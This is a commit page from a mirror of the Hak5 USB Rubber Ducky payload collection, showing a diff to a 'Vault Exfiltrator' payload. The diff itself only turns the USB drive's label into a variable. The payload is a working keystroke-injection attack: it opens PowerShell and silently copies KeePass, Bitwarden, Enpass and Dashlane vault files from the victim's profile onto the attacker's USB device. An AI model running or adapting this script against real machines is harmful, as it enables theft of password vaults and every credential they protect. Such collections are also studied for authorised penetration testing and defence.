HAK5/usbrubberducky-payloads
1
0
Fork 0
mirror of https://github.com/hak5/usbrubberducky-payloads.git synced 2026-02-15 07:29:02 +00:00
Code Issues Packages Projects Releases Wiki Activity

Change label definition in Vault Exfiltrator payload

Browse Source
This commit is contained in:
Daniel Miranda Barcelona
2026-01-31 03:17:44 +01:00
committed by GitHub
parent 51af366ec2
commit 7629c29742
1 changed files with 3 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
payloads/library/exfiltration/Vault_Exfiltrator/payload.txt
View File

@@ -7,12 +7,13 @@ REM Category: exfiltration
REM Props: Hak5 Community
ATTACKMODE HID STORAGE
DEFINE #LABEL DUCKY
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell
DELAY 500
STRINGLN $vol=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
STRINGLN $vol=(Get-Volume -FileSystemLabel '#LABEL').DriveLetter
STRINGLN mkdir $vol':\'VAULTS\
STRINGLN dir "$env:USERPROFILE\Documents\*.kdbx" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
STRINGLN dir "$env:APPDATA\Bitwarden\data.json" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
@@ -22,4 +23,4 @@ STRINGLN dir "$env:APPDATA\Sinew Software Systems Pvt Ltd\Enpass\Enpass\Vaults\*
STRINGLN dir "$env:LOCALAPPDATA\Packages\SinewSoftwareSystems.EnpassPasswordManager_fwdy0m65qb6h2\LocalState\Vaults\*.enpassdb" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
STRINGLN dir "$env:APPDATA\Dashlane\*.dashlane" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
STRINGLN dir "$env:USERPROFILE\Documents\Enpass\*.enpassdb" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
STRINGLN exit
STRINGLN exit